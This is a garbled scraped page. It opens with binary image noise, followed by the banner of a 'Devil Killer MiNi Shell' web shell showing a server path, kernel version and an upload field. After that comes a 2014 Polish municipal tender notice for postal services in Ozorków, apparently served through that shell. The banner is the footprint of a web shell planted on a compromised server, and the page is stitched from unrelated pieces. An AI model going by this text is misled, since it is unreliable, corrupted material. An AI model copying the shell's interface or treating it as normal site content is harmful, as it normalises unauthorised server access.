JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141113/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141113/236391-N-2014.html

<p class="kh_header"><b>Ozorków: Świadczenie usług pocztowych w obrocie krajowym i zagranicznym 
na potrzeby Urzędu Miejskiego / Gminy Miasto Ozorków</b><br>
<b>Numer ogłoszenia: 236391 - 2014; data zamieszczenia: 13.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Ozorków , ul. Wigury 1, 95-035 Ozorków, woj. łódzkie, tel. 042 7103100, 7103142, faks 042 7103101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umozorkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych w obrocie krajowym i zagranicznym 
na potrzeby Urzędu Miejskiego / Gminy Miasto Ozorków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.2.1. Przedmiotem zamówienia jest świadczenie usług pocztowych w obrocie krajowym                                 i zagranicznym w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych                          i zwrotów o wadze do 350g i powyżej 350g od momentu podpisania umowy do 31.12.2015 r.                                na potrzeby Urzędu Miejskiego w Ozorkowie.
3.2.2. Przez przesyłki pocztowe będące przedmiotem zamówienia rozumie się:
1. przesyłki listowe krajowe i zagraniczne o wadze do 2000g -  Gabaryt A i B:
a.	zwykłe ekonomiczne - przesyłka nierejestrowana nie będąca przesyłką najszybszej kategorii i doręczaną w sposób zabezpieczający ją przed utratą, ubytkiem zawartości lub uszkodzeniem
b.	polecone priorytetowe - przesyłka rejestrowana najszybszej kategorii,
c.	polecone ekonomiczne ze zwrotnym potwierdzeniem odbioru - ZPO - przesyłka rejestrowana nie będąca przesyłką najszybszej kategorii, przyjęta za potwierdzeniem nadania i doręczana za pokwitowaniem odbioru,
d.	polecone priorytetowe ze zwrotnym potwierdzeniem poświadczeniem odbioru - ZPO
 - przesyłka najszybszej kategorii przyjęta za potwierdzeniem nadania i doręczana  za pokwitowaniem odbioru,
e.	z zadeklarowaną wartością - przesyłka rejestrowana, za której utratę, ubytek zawartości lub uszkodzenie operator ponosi odpowiedzialność do wysokości zwykłej wartości utraconych rzeczy.
Gabaryt A - to przesyłka o wymiarach:
Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140mm,
Maksimum - żaden z wymiarów nie może przekroczyć wysokości -grubości- 20mm, długości 325mm, szerokości 230mm.
Gabaryt B - to przesyłka o wymiarach:
Minimum - jeśli choć jeden z wymiarów przekracza wysokość (grubość) 20mm lub długość 325mm lub szerokość 230mm,
Maksimum - suma długości, szerokości i wysokości (grubości) 900mm, przy czym największy z tych wymiarów - długość  nie może przekroczyć 600mm.
2) paczki pocztowe krajowe o wadze do 6000 g -Gabaryt A i B:
a) ekonomiczne - paczki rejestrowane nie będące paczkami najszybszej kategorii,
b) ekonomiczne ze zwrotnym potwierdzeniem odbioru - ZPO- paczki rejestrowane ekonomiczne przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru.
Gabaryt A - to przesyłka o wymiarach:
Minimum - wymiary strony adresowej nie mogą być mniejsze niż 90 x 140mm,
Maksimum - żaden z wymiarów nie może przekroczyć długości 600mm, szerokości 500mm, wysokości 300mm.
Gabaryt B - to przesyłka o wymiarach:
Minimum - jeśli choć jeden z wymiarów przekracza długość 600mm, szerokość 500mm, wysokość 300mm,
Maksimum - suma długości i największego obwodu mierzonego w innym kierunku niż długość - 3000mm, przy czym największy wymiar nie może przekroczyć 1500mm.
Ustala się tolerancję wszystkich wymiarów +/- 2mm.
3.2.3. Przez zwroty rozumie się zwroty niedoręczonych przesyłek pocztowych po wyczerpaniu możliwości doręczenia, z podaniem przyczyny niedoręczenia.
3.2.4. Wykonawca przyjmuje do wiadomości, że przyjmowanie, przemieszczanie i doręczanie przesyłek oraz ich zwrotów wykonywane będzie zgodnie z przepisami:
a.	ustawy z dnia 23 listopada 2012 r. Prawo pocztowe Dz. U. z 2012 r. poz. 1529,                    
b.	rozporządzenia Ministra Administracji i Cyfryzacji z dnia 26 listopada 2013 r.                        w sprawie reklamacji usługi pocztowej Dz. U. z 2013 r. poz. 1468, 
c.	rozporządzenie Ministra Administracji i Cyfryzacji z dnia 29 kwietnia 2013 r. w sprawie warunków wykonywania usług powszechnych przez operatora wyznaczonego Dz. u. z 2013 r. poz. 545),
d.	ustawy z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego                            Dz. U. z 2013 r. poz. 267 z późn. zm.,
e.	międzynarodowych przepisów pocztowych,
f.	innych aktów prawnych związanych z realizacją usług będących przedmiotem umowy, wydanych na podstawie ustawy i rozporządzenia oraz postanowień Specyfikacji Istotnych Warunków Zamówienia.


3.2.5. Przewiduje się następujące opcje nadawania przesyłek pocztowych i odbioru przesyłek pocztowych oraz ZPO - zwrotne potwierdzenie odbioru i zwrotów:
1. W przypadku posiadania przez Wykonawcę w miejscowości Ozorków placówki nadawczej                  i odbiorczej Zamawiający w dni robocze od poniedziałku do piątku będzie nadawał jeden raz dziennie przesyłki pocztowe w placówce Wykonawcy w godzinach od 11:00 do 13:00 i odbierał jeden raz dziennie przesyłki pocztowe oraz ZPO - zwrotne potwierdzenie odbioru i zwroty  w placówce Wykonawcy w godzinach od 11:00 do 13:00. Nadawanie przesyłek pocztowych i odbiór przesyłek pocztowych oraz ZPO - zwrotne potwierdzenie odbioru i zwrotów będzie dokonywane przez upoważnionego przedstawiciela Zamawiającego, który będzie posiadał stosowne upoważnienie
2.  W przypadku braku posiadania przez Wykonawcę w miejscowości Ozorków placówki nadawczej
 i odbiorczej Wykonawca zapewni możliwość nadawania przesyłek pocztowych  i odbioru przesyłek pocztowych oraz ZPO (zwrotne potwierdzenie odbioru) i zwrotów poprzez swojego upoważnionego przedstawiciela w siedzibie Zamawiającego ul. Wigury 1, z zastrzeżeniem, że:
a. doręczanie przychodzących przesyłek pocztowych oraz ZPO zwrotnego potwierdzenia odbioru
 i zwrotów do siedziby Zamawiającego będzie odbywać się jeden raz dziennie, w dni robocze                 od poniedziałku do piątku, w godzinach od 11:00 do 13:00. Koszty transportu w tym przypadku ponosi Wykonawca i koszty te należy wliczyć w cenę oferty.
b. odbiór przesyłek przygotowanych do wyekspediowania z siedziby Zamawiającego będzie odbywać się jeden raz dziennie, w dni robocze od poniedziałku do piątku, w godzinach od 11:00 do 13:00. Koszty transportu w tym przypadku ponosi Wykonawca i koszty te należy wliczyć w cenę oferty. 
3.2.6. Usługa dostarczania przesyłek pocztowych świadczona będzie przez Wykonawcę do każdego wskazanego przez Zamawiającego adresu w Polsce i za granicą.
3.2.7. Odbiór przesyłek pocztowych przygotowanych do wyekspediowania będzie każdorazowo dokumentowany przez Wykonawcę pieczęcią, podpisem i datą w pocztowej książce nadawczej lub                w innym równoważnym dokumencie - dla przesyłek rejestrowanych oraz na zestawieniu ilościowym przesyłek wg poszczególnych kategorii wagowych dla przesyłek zwykłych - nierejestrowanych. 
3.2.8. Zwrot niedoręczonych przesyłek pocztowych do Zamawiającego odbywać się będzie niezwłocznie po wyczerpaniu możliwości ich doręczenia, z podaniem przyczyny niedoręczenia.                    W przypadku posiadania przez Wykonawcę placówki nadawczej i odbiorczej w miejscowości Ozorków odbioru zwrotów niedoręczonych przesyłek dokonywać będzie Zamawiający w placówce Wykonawcy. 
3.2.9. Świadczenie przez Wykonawcę dla przesyłek rejestrowanych, usługi komplementarnej - potwierdzenia odbioru przesyłki rejestrowanej: Wykonawca będzie doręczał Zamawiającemu pokwitowane przez adresata potwierdzenie odbioru, niezwłocznie po dokonaniu doręczenia przesyłki, nie później niż w ciągu 7 dni roboczych od dnia doręczenia. W przypadku posiadania przez Wykonawcę placówki nadawczej i odbiorczej w miejscowości Ozorków odbioru pokwitowanego przez adresata potwierdzenie odbioru dokonywać będzie Zamawiający w placówce Wykonawcy. Zamawiającego. 
3.2.10. W każdym przypadku nieobecności adresata przesyłki Wykonawca pozostawi adresatowi zawiadomienie o próbie dostarczenia przesyłki - pierwsze awizo zawierające wskazanie miejsca                        i czasu odbioru przesyłki przez adresata. Termin odbioru przesyłki przez adresata po pierwszym awizo ustala się na 7 dni, licząc od dnia pozostawienia pierwszego zawiadomienia a po upływie tego terminu w przypadku niepodjęcia przesyłki przez adresata wymagane jest wystawienie powtórnego zawiadomienia - powtórne awizo  o możliwości odbioru przesyłki w terminie nie dłuższym niż 14 dni licząc od dnia pierwszego zawiadomienia. Po upływie czternastodniowego terminu nieodebrania przez adresata przesyłka podlega zwrotowi z podaniem przyczyny nieodebrania przesyłki zgodnie z art. 44 Kpa.
3.2.11. Wykonawca zobowiązany jest do honorowania i obsługiwania zwrotnego potwierdzenia odbioru stanowiącego potwierdzenie doręczenia i odbioru przesyłki na zasadach określonych                       w ustawie z dnia 14 czerwca 1960r. Kodeks postępowania administracyjnego Dz. U. z 2013 r. poz. 267 z późn. zm. Zamawiający będzie korzystał z własnych druków zwrotnego potwierdzenia odbioru dla przesyłek krajowych zgodnych z KPA. Zamawiający będzie korzystał z druków zwrotnego potwierdzenia odbioru dla przesyłek zagranicznych należących do Wykonawcy.
3.2.12. Zamawiający zobowiązuje się:
1. do właściwego przygotowania przesyłek pocztowych do nadawania oraz sporządzania zestawień      dla przesyłek nierejestrowanych i rejestrowanych. 
2. do nadawania przesyłek pocztowych w stanie uporządkowanym, przez co należy rozumieć:
a. dla przesyłek rejestrowanych - wpisanie każdej przesyłki do pocztowej książki nadawczej                lub do innego równoważnego dokumentu w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla Wykonawcy w celach rozliczeniowych, a kopia stanowić będzie                              dla Zamawiającego potwierdzenie nadania danej partii przesyłek,
b. dla przesyłek zwykłych - nierejestrowanych - zestawienie ilościowe przesyłek  wg poszczególnych kategorii wagowych sporządzone dla celów rozliczeniowych w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla Wykonawcy w celach rozliczeniowych, a kopia stanowić będzie dla Zamawiającego potwierdzenie nadania danej partii przesyłek,
3. do umieszczenia na przesyłce pocztowej nazwy odbiorcy wraz z jego adresem podany jednocześnie w pocztowej książce nadawczej lub w innym równoważnym dokumencie dla przesyłek rejestrowanych oraz pieczątki nadruku określającej pełną nazwę i adres Zamawiającego na stronie adresowej każdej nadawanej przesyłki,
4. do umieszczenia na stronie adresowej przesyłek, w miejscu przeznaczonym na opłatę napisu nadruku lub odcisku pieczęci o treści wskazanej przez Wykonawcę.  
3.2.13. Opakowanie przesyłek listowych stanowi koperta Zamawiającego, odpowiednio zabezpieczona. Opakowanie paczki powinno stanowić zabezpieczenie przed dostępem                               do zawartości oraz aby uniemożliwiało uszkodzenie przesyłki w czasie przemieszczania. Zamawiający będzie korzystał wyłącznie ze swojego opakowania przesyłek pocztowych. 
3.2.14. Zamawiający określił w formularzu ofertowym przewidywane ilości nadawanych przesyłek przez okres obowiązywania umowy podpisanej z wybranym Wykonawcą. Rodzaje i liczba przesyłek są szacunkowe i mogą ulec zmianie w zależności od potrzeb Zamawiającego, na co Wykonawca wyraża zgodę tym samym oświadczając, że nie będzie dochodził roszczeń z tytułu zmian rodzajowych     i liczbowych w trakcie realizacji umowy. Faktyczne ilości realizowanych przesyłek w okresie obowiązywania umowy będą wynikać z aktualnych potrzeb Zamawiającego, a więc mogą odbiegać od ilości wskazanych w formularzu ofertowym. 
3.2.15. Za okres rozliczeniowy przyjmuje się jeden miesiąc kalendarzowy. Podstawą obliczenia należności będzie suma opłat za przesyłki faktycznie nadane lub zwrócone z powodu braku możliwości ich doręczenia w okresie rozliczeniowym, potwierdzona co do ilości i wagi                             na podstawie dokumentów nadawczych lub dokumentów oddawczych dokumentujących zwrot przesyłek, kiedy możliwość dostarczenia została wyczerpana. Opłata za niewykonane usługi komplementarne tj. potwierdzenie odbioru przesyłki rejestrowanej wniesiona przy nadawaniu przesyłek podlega zwrotowi. Zwrot ten dokonywany będzie poprzez pomniejszenie kwoty opłat               za zwrócone przesyłki. Różnica kwot za zwrot przesyłek oraz opłat należnych z tytułu niewykonania usług komplementarnych stanowić będzie należność dla Wykonawcy. W przypadku nadania przez Zamawiającego przesyłek nie ujętych w formularzu ofertowym podstawą rozliczeń będą ceny z aktualnego cennika usług pocztowych Wykonawcy.
3.2.16. Reklamacje z tytułu niewykonania usługi Zamawiający może zgłosić do Wykonawcy                    po upływie 14 dni od nadania przesyłki rejestrowanej, nie później jednak niż 12 miesięcy od ich nadania. Termin udzielenia odpowiedzi na reklamację nie może przekroczyć 30 dni od dnia otrzymania reklamacji.
3.2.17. W przypadku uszkodzenia przesyłki pocztowej przez Wykonawcę ma on obowiązek zabezpieczyć przesyłkę i nanieść adnotację z informacją o osobie dokonującej zabezpieczenia.
3.2.18. W przypadku stwierdzenia zastrzeżeń dotyczących przekazanych do nadania przesyłek, Wykonawca wyjaśnia je telefonicznie z Zamawiającym.
3.2.19. Zamawiający i Wykonawca dopuszczają możliwość przesunięcia nadania przesyłek                        na dzień następny, w przypadku uzasadnionych zastrzeżeń do przekazanych do nadania przesyłek pocztowych nieprawidłowe opakowanie, brak pełnego adresu, niezgodność wpisów                                 do dokumentów nadawczych z wpisami na przesyłkach, brak znaków opłaty i braku możliwości ich wyjaśnienia lub usunięcia w dniu ich przekazania do nadania.
3.2.20. Cena jednostkowa podana przez Wykonawcę w formularzu ofertowym nie będzie ulegała zmianom przez cały okres obowiązywania umowy.

Zamawiający nie dopuszcza sytuacji, w której część przesyłek zostanie nadana przez inny podmiot na rzecz i w imieniu Zamawiającego, w wyniku czego na dowodzie nadania przesyłki będzie figurował inny podmiot  niż Zamawiający
Zamówienie może być realizowane przy pomocy podwykonawców. W takim przypadku Wykonawca zobowiązany jest wskazać w ofercie część zakres zamówienia, której wykonanie zamierza powierzyć podwykonawcom. 
Wykonawca odpowiadać będzie za wszelkie błędy i szkody powstałe w wyniku działania podwykonawcy oraz odpowiedzialny jest za prawidłowość, terminowość i jakość robót świadczonych przez podwykonawców..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających nie przekraczających 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca przedłoży aktualne zaświadczenie o wpisie do rejestru operatorów pocztowych zgodnie z art. 6.1. Ustawy Prawo pocztowe Dz. U. z 2012 r., poz. 1529
Ocena spełnienia warunku na zasadzie SPEŁNIA / NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
W celu weryfikacji rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawcy, Zamawiający wymaga wskazania usług o wartości nie mniejszej niż 90 000 zł brutto.
Warunek zostanie spełniony, gdy Wykonawca wskaże 2 najważniejsze usługi ujęte 
w wykazie (wiersz 1 i 2) polegające na świadczeniu usług w obrocie pocztowym w zakresie przyjmowania, przemieszczania i doręczania przesyłek o wartości nie mniejszej 
niż 90 000 zł brutto i załączy do nich dowody określające, czy usługi te zostały wykonane lub są wykonywane należycie, z czego przez jedną usługę rozumie się usługę będącą przedmiotem jednostkowej, odrębnej umowy - załącznik nr 6 do SIWZ.
Ocena spełnienia warunku na zasadzie SPEŁNIA / NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca złoży podpisane oświadczenie 
o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy - załącznik nr 2 do SIWZ
Ocena spełnienia warunku na zasadzie SPEŁNIA / NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca złoży podpisane oświadczenie 
o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy - załącznik nr 2 do SIWZ
Ocena spełnienia warunku na zasadzie SPEŁNIA / NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia minimalna kwota ubezpieczenia - 100 000,00 zł.
Ocena spełnienia warunku na zasadzie SPEŁNIA / NIE SPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy - załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin płatności faktury w dniach  - nie mniej niż 7 dni i nie więcej niż 30 dni - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy PZP Zamawiający dopuszcza następujące zmiany postanowień umowy stanowiącej załącznik nr 5 do SIWZ:
- zmiany nazwy - firmy bądź siedziby - adresu którejkolwiek ze stron umowy,
- zmiany terminu wykonania zamówienia z przyczyn obiektywnie uzasadnionych
i niezależnych od Wykonawcy, których przy zachowaniu należytej staranności nie był w stanie przewidzieć,
-  zmiany terminu wykonania zamówienia z przyczyn obiektywnie uzasadnionych i niezależnych od Zamawiającego, których przy zachowaniu należytej staranności nie był w stanie przewidzieć;
